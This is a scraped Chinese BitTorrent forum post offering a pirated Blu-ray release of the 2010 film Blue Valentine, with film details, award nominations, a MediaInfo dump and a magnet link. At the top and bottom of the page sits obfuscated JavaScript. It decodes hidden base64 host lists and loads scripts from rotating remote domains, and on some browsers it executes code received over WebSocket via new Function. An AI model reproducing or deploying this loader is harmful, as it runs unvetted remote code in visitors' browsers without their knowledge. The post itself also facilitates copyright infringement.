蓝色情人节[中文字幕].Blue.Valentine.2010.1080p.BluRay.x265.10bit.DTS 6.16GB

版主小s 1月前 188

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 蓝色情人节 / 有人喜欢蓝(港)

◎片 名 Blue Valentine

◎年 代 2010

◎产 地 美国

◎类 别 剧情 / 爱情

◎语 言 英语

◎上映日期 2010-12-29(美国)

◎IMDb链接 https://www.imdb.com/title/tt1120985/

◎豆瓣评分 7.8/10 (86883人评价)

◎豆瓣链接 https://movie.douban.com/subject/2974278/

◎片 长 112分钟

◎导 演 德里克·斯安弗朗斯 Derek Cianfrance (id:1280800)

◎编 剧 德里克·斯安弗朗斯 Derek Cianfrance (id:1280800)

Joey Curtis Joey Curtis (id:1281639)

◎演 员 瑞恩·高斯林 Ryan Gosling (id:1012531)

米歇尔·威廉姆斯 Michelle Williams (id:1049491)

费丝·瓦拉迪卡 Faith Wladyka (id:1032490)

约翰·道曼 John Doman (id:1079545)

迈克·沃格尔 Mike Vogel (id:1027793)

玛丽安·普朗科特 Maryann Plunkett (id:1426940)

瑞恩·高斯林 Ryan Gosling (id:1012531)

米歇尔·威廉姆斯 Michelle Williams (id:1049491)

埃林·贝纳赫 Erin Benach (id:1408698)

斯科特·斯比德曼 Scott Speedman (id:1049589)

◎标 签 爱情 / 美国 / 婚姻 / 家庭 / 剧情 / 2010 / 文艺 / 生活

◎简 介

《蓝色情人节》在分级上经历了一波三折,最终被定为R级。

Dean(瑞恩·高斯林 Ryan Gosling 饰)和Cindy(米歇尔·威廉姆斯 Michelle Williams 饰)在朝夕相处了六个年头之后,他们的婚姻出现了问题。两人想借情人节之际修补彼此的关系, 特意将女儿留在外公家。他们还特意找了一家情人酒店,想找点新的“兴奋点”来刺激自己的爱情。可两人就对未来的生活态度发生了争执,感情不但没有修复反而愈吵愈烈。Dean安逸于有妻女的平淡生活,但Cindy却希望开创属于自己的事业。随着两人的分歧不断升温,那些以往美好婚姻生活中的幸福的片段如今却变成了令人难堪和苦恼的回忆。是否一段感情必须要经历“七年之痒”的磨练?这两个曾经相爱的彼此,曾经甜蜜的婚姻,否则最终会走向支离破碎?

◎获奖情况 (共8项)

第83届奥斯卡金像奖 (2011)

最佳女主角(提名)

└──米歇尔·威廉姆斯 (id:1049491)

第63届戛纳电影节 (2010)

一种关注单元 一种关注大奖(提名)

└──德里克·斯安弗朗斯 (id:1280800)

第68届金球奖 (2011)

电影类 剧情片最佳男主角(提名)

└──瑞恩·高斯林 (id:1012531)

电影类 剧情片最佳女主角(提名)

└──米歇尔·威廉姆斯 (id:1049491)

第15届圣地亚哥影评人协会奖 (2010)

最佳女主角(提名)

└──米歇尔·威廉姆斯 (id:1049491)

第23届芝加哥影评人协会奖 (2010)

最佳男主角(提名)

└──瑞恩·高斯林 (id:1012531)

最佳女主角(提名)

└──米歇尔·威廉姆斯 (id:1049491)

最具潜力导演

└──德里克·斯安弗朗斯 (id:1280800)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 9153315222163650996008216651833589461 (0x6E2DD4882C8480BC70BAC444C18BED5)

  4. Complete name : [email protected].mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.16 GiB

  8. Duration : 1 h 52 min

  9. Overall bit rate : 7 870 kb/s

  10. Encoded date : UTC 2021-11-02 03:47:48

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 52 min

  20. Bit rate : 7 017 kb/s

  21. Width : 1 792 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 5:3

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.151

  30. Stream size : 5.49 GiB (89%)

  31. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=19.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1792x1080 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. ID in the original source medium : 4352 (0x1100)

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 52 min

  42. Bit rate mode : Constant

  43. Bit rate : 768 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 616 MiB (10%)

  51. Language : English

  52. Default : Yes

  53. Forced : No

  54. Original source medium : Blu-ray


  55. Text #1

  56. ID : 3

  57. ID in the original source medium : 4615 (0x1207)

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 46 min

  63. Bit rate : 44.1 kb/s

  64. Count of elements : 2545

  65. Stream size : 33.7 MiB (1%)

  66. Title : chs&eng

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No

  70. Original source medium : Blu-ray


  71. Text #2

  72. ID : 4

  73. ID in the original source medium : 4616 (0x1208)

  74. Format : PGS

  75. Muxing mode : zlib

  76. Codec ID : S_HDMV/PGS

  77. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration : 1 h 46 min

  79. Bit rate : 44.4 kb/s

  80. Count of elements : 2545

  81. Stream size : 33.9 MiB (1%)

  82. Title : cht&eng

  83. Language : Chinese

  84. Default : No

  85. Forced : No

  86. Original source medium : Blu-ray


  87. Text #3

  88. ID : 5

  89. ID in the original source medium : 4617 (0x1209)

  90. Format : PGS

  91. Muxing mode : zlib

  92. Codec ID : S_HDMV/PGS

  93. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration : 1 h 46 min

  95. Bit rate : 25.3 kb/s

  96. Count of elements : 2545

  97. Stream size : 19.3 MiB (0%)

  98. Title : chs

  99. Language : Chinese

  100. Default : No

  101. Forced : No

  102. Original source medium : Blu-ray


  103. Text #4

  104. ID : 6

  105. ID in the original source medium : 4618 (0x120A)

  106. Format : PGS

  107. Muxing mode : zlib

  108. Codec ID : S_HDMV/PGS

  109. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  110. Duration : 1 h 46 min

  111. Bit rate : 25.6 kb/s

  112. Count of elements : 2545

  113. Stream size : 19.5 MiB (0%)

  114. Title : cht

  115. Language : Chinese

  116. Default : No

  117. Forced : No

  118. Original source medium : Blu-ray


  119. Text #5

  120. ID : 7

  121. ID in the original source medium : 4609 (0x1201)

  122. Format : PGS

  123. Muxing mode : zlib

  124. Codec ID : S_HDMV/PGS

  125. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  126. Duration : 1 h 50 min

  127. Bit rate : 44.8 kb/s

  128. Count of elements : 2580

  129. Stream size : 35.3 MiB (1%)

  130. Title : eng

  131. Language : English

  132. Default : No

  133. Forced : No

  134. Original source medium : Blu-ray


  135. Menu

  136. 00:00:00.000 : en:Chapter 01

  137. 00:06:06.990 : en:Chapter 02

  138. 00:14:01.173 : en:Chapter 03

  139. 00:20:20.551 : en:Chapter 04

  140. 00:27:27.811 : en:Chapter 05

  141. 00:32:30.530 : en:Chapter 06

  142. 00:43:46.206 : en:Chapter 07

  143. 00:53:54.438 : en:Chapter 08

  144. 01:03:32.849 : en:Chapter 09

  145. 01:11:57.938 : en:Chapter 10

  146. 01:19:10.537 : en:Chapter 11

  147. 01:22:43.166 : en:Chapter 12

  148. 01:31:27.939 : en:Chapter 13

  149. 01:37:48.863 : en:Chapter 14

  150. 01:42:12.667 : en:Chapter 15




复制代码


TAGS 剧情 爱情

磁力链:
  • magnet:?xt=urn:btih:2CC3DBED3BF275CBE277A20B54A4FEDC61DADB65

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};